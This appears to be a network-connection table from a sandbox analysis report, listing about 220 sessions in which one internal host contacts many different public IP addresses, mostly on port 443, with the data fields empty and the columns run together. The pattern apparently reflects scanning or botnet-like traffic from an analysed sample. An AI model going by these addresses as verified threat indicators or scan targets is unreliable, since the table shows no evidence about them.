                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11396192.168.2.2352370111.199.136.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11397192.168.2.235975278.235.160.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11398192.168.2.235426879.242.236.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11399192.168.2.233419874.73.186.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11400192.168.2.2344404137.119.149.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11401192.168.2.2348506162.49.94.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11402192.168.2.2333020152.140.74.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11403192.168.2.234811863.173.41.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11404192.168.2.235377618.235.198.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11405192.168.2.2355336196.80.82.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11406192.168.2.2346072189.232.191.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11407192.168.2.234393639.137.234.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11408192.168.2.234748851.92.231.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11409192.168.2.2341626119.95.34.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11410192.168.2.2333272140.227.222.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11411192.168.2.2351642105.59.93.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11412192.168.2.2346886176.175.8.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11413192.168.2.2358306169.171.48.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11414192.168.2.2333734126.182.34.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11415192.168.2.234576852.144.93.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11416192.168.2.2350380124.152.195.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11417192.168.2.2341740122.165.174.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11418192.168.2.2355760153.230.114.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11419192.168.2.2359922161.31.98.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11420192.168.2.2349684208.236.144.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11421192.168.2.2343620162.242.94.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11422192.168.2.235882285.122.70.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11423192.168.2.234985254.98.114.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11424192.168.2.2353810169.176.228.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11425192.168.2.2335666219.97.108.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11426192.168.2.2338320172.43.156.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11427192.168.2.2335442112.135.168.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11428192.168.2.2357426196.38.57.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11429192.168.2.2333556185.221.29.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11430192.168.2.234201246.25.88.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11431192.168.2.2351028113.136.118.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11432192.168.2.2354742136.184.160.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11433192.168.2.234835254.44.160.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11434192.168.2.234802639.190.193.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11435192.168.2.23530204.23.59.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11436192.168.2.234463023.119.193.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11437192.168.2.2357534218.94.227.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11438192.168.2.2360270221.228.182.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11439192.168.2.2337596204.34.191.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11440192.168.2.2338040220.109.230.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11441192.168.2.2351334157.107.181.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11442192.168.2.2350872223.253.246.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11443192.168.2.23421725.190.207.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11444192.168.2.2335604191.235.69.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11445192.168.2.235336240.104.147.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11446192.168.2.235897264.140.222.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11447192.168.2.2353102187.167.242.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11448192.168.2.2356820159.219.95.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11449192.168.2.2350074117.237.80.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11450192.168.2.2337092136.250.142.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11451192.168.2.233423086.151.236.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11452192.168.2.235027654.232.112.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11453192.168.2.2350822123.183.29.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11454192.168.2.2347070194.227.151.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11455192.168.2.2354756217.54.2.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11456192.168.2.234464817.92.33.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11457192.168.2.2337598211.125.235.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11458192.168.2.2358782148.105.241.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11459192.168.2.2334196121.103.30.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11460192.168.2.2337672217.93.162.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11461192.168.2.233743813.110.9.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11462192.168.2.235753840.146.1.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11463192.168.2.233928078.23.240.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11464192.168.2.234655068.243.152.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11465192.168.2.2356426166.35.241.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11466192.168.2.2334998191.94.214.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11467192.168.2.2337890113.133.206.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11468192.168.2.2340848209.59.82.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11469192.168.2.2340828204.73.194.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11470192.168.2.2360448140.0.201.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11471192.168.2.234021449.177.221.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11472192.168.2.2356026174.166.182.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11473192.168.2.2352006165.236.197.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11474192.168.2.2340362137.33.108.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11475192.168.2.2356392156.252.195.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11476192.168.2.2357128186.140.48.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11477192.168.2.2356330138.62.229.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11478192.168.2.234213662.249.40.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11479192.168.2.233531242.232.233.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11480192.168.2.2341970102.99.11.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11481192.168.2.2349820176.22.206.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11482192.168.2.234013497.144.60.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11483192.168.2.2342438205.137.160.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11484192.168.2.233657814.59.65.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11485192.168.2.233684476.51.2.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11486192.168.2.2338046134.187.169.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11487192.168.2.2336524222.151.209.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11488192.168.2.2334810124.136.61.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11489192.168.2.233459641.122.33.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11490192.168.2.2359772148.222.224.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11491192.168.2.2357042180.65.14.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11492192.168.2.23458801.246.253.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11493192.168.2.2353622192.238.31.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11494192.168.2.2353086192.202.90.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11495192.168.2.234226235.112.158.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11496192.168.2.2359002201.18.234.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11497192.168.2.2334824104.2.141.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11498192.168.2.235094014.138.10.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11499192.168.2.2351188102.119.156.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11500192.168.2.236079459.127.135.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11501192.168.2.2354926197.184.255.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11502192.168.2.2333670217.112.186.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11503192.168.2.2354684205.26.160.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11504192.168.2.2352310131.40.131.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11505192.168.2.234337496.170.65.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11506192.168.2.235643878.183.108.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11507192.168.2.2344314172.217.109.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11508192.168.2.2352716162.97.1.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11509192.168.2.2344130172.167.65.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11510192.168.2.235937432.97.83.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11511192.168.2.2350096112.190.174.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11512192.168.2.235026098.85.79.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11513192.168.2.2351968151.66.193.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11514192.168.2.2347200165.84.216.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11515192.168.2.234611062.44.141.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11516192.168.2.2360440148.221.221.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11517192.168.2.2358012151.104.249.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11518192.168.2.234584063.117.118.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11519192.168.2.233781691.187.156.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11520192.168.2.233509857.159.76.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11521192.168.2.2360478104.189.150.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11522192.168.2.234266264.74.102.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11523192.168.2.235137643.81.73.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11524192.168.2.234036664.177.184.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11525192.168.2.2337594191.46.14.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11526192.168.2.2336948138.150.224.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11527192.168.2.2340968162.39.201.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11528192.168.2.23523685.236.56.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11529192.168.2.235461217.16.231.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11530192.168.2.2338894222.10.51.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11531192.168.2.2359438187.4.9.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11532192.168.2.2336676120.146.247.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11533192.168.2.2341794142.1.32.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11534192.168.2.2342190128.93.213.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11535192.168.2.235566249.83.211.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11536192.168.2.23548389.141.122.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11537192.168.2.2347478221.113.59.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11538192.168.2.234910863.43.149.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11539192.168.2.2347438163.238.123.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11540192.168.2.2334204135.103.149.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11541192.168.2.234157014.24.186.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11542192.168.2.235842673.228.51.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11543192.168.2.2356408217.51.144.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11544192.168.2.2337884113.224.249.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11545192.168.2.233478690.76.248.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11546192.168.2.2343420148.109.253.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11547192.168.2.2349232128.76.30.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11548192.168.2.2336236159.193.125.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11549192.168.2.23534205.110.245.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11550192.168.2.2352880119.44.242.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11551192.168.2.2333346171.22.133.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11552192.168.2.2347500152.9.64.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11553192.168.2.2351510202.197.39.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11554192.168.2.2334186199.232.199.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11555192.168.2.2355872112.216.185.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11556192.168.2.234732668.49.205.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11557192.168.2.235174871.80.222.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11558192.168.2.2355526135.112.168.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11559192.168.2.2349550144.153.92.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11560192.168.2.234785895.111.16.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11561192.168.2.2356692189.242.151.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11562192.168.2.2339916218.161.30.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11563192.168.2.234716263.130.171.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11564192.168.2.2342456149.30.59.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11565192.168.2.235583850.55.108.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11566192.168.2.233465043.168.201.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11567192.168.2.2357080151.82.158.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11568192.168.2.2340582145.88.142.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11569192.168.2.233834239.114.240.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11570192.168.2.2346226153.164.125.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11571192.168.2.234783260.139.186.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11572192.168.2.2338506210.54.46.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11573192.168.2.235304495.136.21.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11574192.168.2.2346980190.91.71.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11575192.168.2.2355844150.55.146.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11576192.168.2.235303645.80.151.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11577192.168.2.234400641.185.205.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11578192.168.2.2352896217.2.117.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11579192.168.2.2342220156.14.159.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11580192.168.2.2334458164.229.15.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11581192.168.2.23386245.71.157.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11582192.168.2.2341532151.84.241.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11583192.168.2.2337096209.243.6.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11584192.168.2.233327231.255.34.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11585192.168.2.234403636.209.226.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11586192.168.2.2357732164.155.146.28080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11587192.168.2.2350380203.121.70.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11588192.168.2.2333238116.234.238.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11589192.168.2.2354510144.152.40.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11590192.168.2.233485686.132.234.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11591192.168.2.235218031.109.11.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11592192.168.2.236014458.9.44.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11593192.168.2.235643077.253.0.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11594192.168.2.236024294.0.61.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11595192.168.2.2347518199.225.237.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11596192.168.2.2354048138.235.88.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11597192.168.2.2346790177.79.122.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11598192.168.2.233708086.83.123.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11599192.168.2.234939241.73.247.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11600192.168.2.234595680.241.79.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11601192.168.2.235141084.141.94.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11602192.168.2.2360458167.42.205.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11603192.168.2.233720051.13.242.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11604192.168.2.234811666.162.254.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11605192.168.2.23441801.202.166.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11606192.168.2.2358066197.159.217.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11607192.168.2.2347680102.45.161.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11608192.168.2.2344812163.197.246.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11609192.168.2.2338468105.31.157.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11610192.168.2.2344860130.216.146.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11611192.168.2.233895891.158.6.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11612192.168.2.2348520176.2.254.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11613192.168.2.2357498173.226.230.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11614192.168.2.234774666.177.219.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11615192.168.2.2341166163.176.137.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11616192.168.2.2349870192.170.74.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11617192.168.2.2350740118.222.91.109443
